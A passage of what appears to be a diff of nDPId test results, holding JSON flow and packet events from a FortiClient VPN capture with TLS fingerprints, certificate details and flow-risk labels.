{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -01399{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067203571,"flow_last_seen":1621067203854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":374,"midstream":0,"thread_ts_msec":1621067203854,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} 
+01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067203571,"flow_last_seen":1621067203776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1621067203776,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01121{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067203571,"flow_last_seen":1621067203852,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1611,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1621067203852,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01399{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067203571,"flow_last_seen":1621067203854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":374,"midstream":0,"thread_ts_msec":1621067203854,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067204622,"flow_last_seen":1621067204622,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067204622,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1621067204622,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067204622,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFuKMux1NwAAAAAALAC\/\/\/kHgAAAgQFtAEDAwUBAQgKJ6dAbwAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1621067204682,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067204682,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8DZFAADQG9nJSUS4NwKgBsijL8W6yVLN5sdTcAaASOEC\/ugAAAgQFrAQCCAoGP5ENJ6dAbwEDAwo="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1621067204682,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067204682,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFuKMux1NwBslSzeoAQECwWWwAAAQEICienQKoGP5EN"} -01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067204622,"flow_last_seen":1621067204827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067204827,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01142{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067204622,"flow_last_seen":1621067204898,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067204898,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -01408{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067204622,"flow_last_seen":1621067204900,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067204900,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} +01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067204622,"flow_last_seen":1621067204827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067204827,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01142{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067204622,"flow_last_seen":1621067204898,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067204898,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01408{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067204622,"flow_last_seen":1621067204900,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067204900,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067205651,"flow_last_seen":1621067205651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067205651,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1621067205651,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067205651,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFzKMsSeiBCAAAAALAC\/\/87PQAAAgQFtAEDAwUBAQgKJ6dEZQAAAAAEAgAA"} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1621067205710,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067205710,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8c5FAADQGkHJSUS4NwKgBsijL8XP7CfxqEnogQ6ASOECEzAAAAgQFrAQCCAoGP5FzJ6dEZQEDAwo="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1621067205710,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067205710,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFzKMsSeiBD+wn8a4AQECzbbQAAAQEICienRJ8GP5Fz"} -01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067205651,"flow_last_seen":1621067205856,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067205856,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01142{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067205651,"flow_last_seen":1621067205926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067205926,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -01408{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067205651,"flow_last_seen":1621067205928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067205928,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} +01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067205651,"flow_last_seen":1621067205856,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067205856,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01142{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067205651,"flow_last_seen":1621067205926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067205926,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +01408{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067205651,"flow_last_seen":1621067205928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067205928,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"5":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067206773,"flow_last_seen":1621067206773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067206773,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1621067206773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067206773,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfF0KMspKYnJAAAAALAC\/\/+2swAAAgQFtAEDAwUBAQgKJ6dItwAAAAAEAgAA"} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1621067206833,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067206833,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA85JFAADQGH3JSUS4NwKgBsijL8XTNezJoKSmJyqASOED3YgAAAgQFrAQCCAoGP5HkJ6dItwEDAwo="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1621067206833,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067206833,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfF0KMspKYnKzXsyaYAQECxOAgAAAQEICienSPMGP5Hk"} -01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067206773,"flow_last_seen":1621067206977,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067206977,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI 